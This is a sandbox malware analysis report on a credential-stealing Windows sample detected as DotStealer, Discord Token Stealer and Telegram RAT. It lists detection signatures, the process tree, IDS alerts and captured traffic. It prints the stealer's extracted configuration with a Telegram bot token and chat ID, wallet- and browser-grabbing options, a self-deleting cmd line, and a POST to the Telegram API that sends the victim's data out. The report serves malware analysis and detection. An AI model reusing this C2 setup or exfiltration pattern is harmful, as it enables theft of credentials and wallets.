Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hvqc3lk7ly.exe

Overview

General Information

Sample name:hvqc3lk7ly.exe
renamed because original name is a hash value
Original sample name:177a970a8a6c5e5e6b5c04c40bf3fe1c.exe
Analysis ID:1574860
MD5:177a970a8a6c5e5e6b5c04c40bf3fe1c
SHA1:64709ca99a03f416a854817427d4543043e204ad
SHA256:2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb
Tags:exeuser-abuse_ch
Infos:

Detection

Discord Token Stealer, DotStealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Discord Token Stealer
Yara detected DotStealer
Yara detected Telegram RAT
Yara detected Telegram Recon
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • hvqc3lk7ly.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\hvqc3lk7ly.exe" MD5: 177A970A8A6C5E5E6B5C04C40BF3FE1C)
    • cmd.exe (PID: 7088 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp2A4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp2A4E.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "https://api.telegram.org/bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendMessage"}
{"Telegram Token": "8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk", "Telegram Chatid": "6518356118", "StartDelay": "0", "RegistryKey": "GlobalIrisService", "BrAgressive": "true", "TgData": "true", "Metamask": "true", "Exodus": "true", "grabDesktop": "true", "MeltFile": "true", "PreventStartOnVirtualMachine": "true", "NoInstall": "true"}
SourceRuleDescriptionAuthorStrings
hvqc3lk7ly.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    hvqc3lk7ly.exeJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
      hvqc3lk7ly.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        hvqc3lk7ly.exeJoeSecurity_DotStealerYara detected DotStealerJoe Security
          hvqc3lk7ly.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000000.00000002.2458683778.00000215DBE8D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DotStealerYara detected DotStealerJoe Security
              00000000.00000002.2458683778.00000215DBDE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                00000000.00000002.2458683778.00000215DC0B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                  00000000.00000000.2321958797.00000215D99D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                    00000000.00000000.2321958797.00000215D99D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 8 entries
                      SourceRuleDescriptionAuthorStrings
                      0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                        0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                          0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpackJoeSecurity_DotStealerYara detected DotStealerJoe Security
                            0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                              0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                Click to see the 10 entries
                                No Sigma rule has matched
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-13T17:48:25.482177+010020390091A Network Trojan was detected149.154.167.220443192.168.2.1249715TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-13T17:48:19.988848+010028033053Unknown Traffic192.168.2.1249713208.95.112.180TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-13T17:48:24.562020+010028438561A Network Trojan was detected192.168.2.1249715149.154.167.220443TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: hvqc3lk7ly.exeMalware Configuration Extractor: Dot Stealer {"Telegram Token": "8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk", "Telegram Chatid": "6518356118", "StartDelay": "0", "RegistryKey": "GlobalIrisService", "BrAgressive": "true", "TgData": "true", "Metamask": "true", "Exodus": "true", "grabDesktop": "true", "MeltFile": "true", "PreventStartOnVirtualMachine": "true", "NoInstall": "true"}
                                Source: hvqc3lk7ly.exe.6812.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendMessage"}
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                                Source: hvqc3lk7ly.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\hvqc3lk7ly.exeCode function: 0_2_00007FFE73450B50 GetCurrentProcessId,GetEnvironmentVariableA,lstrlenA,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,wsprintfA,GetEnvironmentVariableA,lstrlenA,lstrcatA,lstrcatA,lstrcmpA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_00007FFE73450B50
                                Source: C:\Users\user\Desktop\hvqc3lk7ly.exeCode function: 0_2_00007FFE73419020 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,0_2_00007FFE73419020
                                Source: C:\Users\user\Desktop\hvqc3lk7ly.exeCode function: 0_2_00007FFE73418FE0 CryptReleaseContext,0_2_00007FFE73418FE0
                                Source: C:\Users\user\Desktop\hvqc3lk7ly.exeCode function: 0_2_00007FFE73418DC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,0_2_00007FFE73418DC0
                                Source: hvqc3lk7ly.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.12:49711 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49715 version: TLS 1.2
                                Source: hvqc3lk7ly.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: C:\Users\attat\source\repos\DotStealer-Builder (1.7) - NOT READY\DotStealer\DotStealer\obj\Release\net462\svchost.pdb source: hvqc3lk7ly.exe
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: hvqc3lk7ly.exe, 00000000.00000002.2472091914.00000215F47A0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: hvqc3lk7ly.exe, 00000000.00000002.2472091914.00000215F47A0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: hvqc3lk7ly.exe, 00000000.00000002.2471736410.00000215F4730000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: hvqc3lk7ly.exe, sqlite.interop.dll.0.dr
                                Source: Binary string: costura.costura.pdb.compressed source: hvqc3lk7ly.exe
                                Source: Binary string: BouncyCastle.Crypto.pdb source: hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EBE4D000.00000004.00000800.00020000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2473588774.00000215F57A0000.00000004.08000000.00040000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EC84D000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: hvqc3lk7ly.exe
                                Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EBE4D000.00000004.00000800.00020000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2473588774.00000215F57A0000.00000004.08000000.00040000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EC84D000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: hvqc3lk7ly.exe
                                Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: hvqc3lk7ly.exe
                                Source: C:\Users\user\Desktop\hvqc3lk7ly.exeCode function: 0_2_00007FFE73411DB0 FindFirstFileExA,0_2_00007FFE73411DB0
                                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\userUserCash\Jump to behavior
                                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\userUserCash\COOKIE~1Jump to behavior
                                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.12:49715 -> 149.154.167.220:443
                                Source: Network trafficSuricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.12:49715
                                Source: unknownDNS query: name: api.telegram.org
                                Source: global trafficHTTP traffic detected: GET /attatier/Cloud/main/DotInfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendDocument?chat_id=6518356118&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%208.46.123.189%0AUsername:%20user%0ALocation:%20United%20States%20[US],%20New%20York,%20New%20York HTTP/1.1Content-Type: multipart/form-data; boundary="001311e3-96ad-484e-83e7-c922d23536ab"Host: api.telegram.orgContent-Length: 87825Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS